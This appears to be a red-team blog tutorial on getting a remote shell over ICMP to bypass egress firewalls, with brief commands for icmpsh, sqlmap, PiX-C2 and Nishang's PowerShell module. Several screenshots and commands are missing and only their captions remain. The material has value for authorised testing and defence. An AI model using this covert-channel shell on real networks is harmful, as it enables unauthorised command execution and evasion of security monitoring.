Most systems in internal networks are behind firewalls and corporate proxies in order to control inbound and outbound Internet traffic. Firewalls can block reverse and bind TCP connections. However ICMP traffic most of the times is permitted. Therefore it is possible to use this protocol as a covert channel in order to obtain a shell and execute commands remotely on a target host.

This is an old technique which was used most of the times in restricted environments to receive a shell but in nowadays with the spread of Red Team engagements it can be used as another method to execute commands by using ICMP traffic and bypass egress filtering.

The tool icmpsh can be used to perform this attack effectively. Bernardo Damele imported this into his tool sqlmap which can be triggered with the –os-pwn switch.

The following commands will disable all ICMP echo replies which is essential for the tool to work properly and will start a listener which will wait for ICMP packets from the target host:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

The GitHub repository of the icmpsh tool contains also a binary which needs to be transferred and executed on the target host. The following command will send ICMP traffic to the master host:

icmpsh.exe -t
ICMP Shell - Executing Binary
ICMP Shell – Executing Binary

A shell will received over ICMP and commands can be executed through this channel.

ICMP Shell
Shell over ICMP

Daniel Compton developed a script to automate the process. The only input that this script requires is the IP address of the target host. This script is contained in the icmpsh repository on GitHub.

ICMP Shell - Automation
ICMP Shell – Automation

There are various other tools that exist online as alternatives to perform command and control over ICMP like PiX-C2.

PiX-C2 – ICMP C2


Nishang  framework contains a PowerShell module which can be used in combination with icmpsh python script to obtain a shell over ICMP. On the master host the following command will wait for any incoming ICMP packets.


On the target host the PowerShellIcmp module requires only the master IP address:

Import-Module .\Invoke-PowerShellIcmp.ps1
Nishang Module - ICMP Shell
Nishang Module – ICMP Shell

The connection will received from the master host.

PowerShell - ICMP Shell
PowerShell – ICMP Shell


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s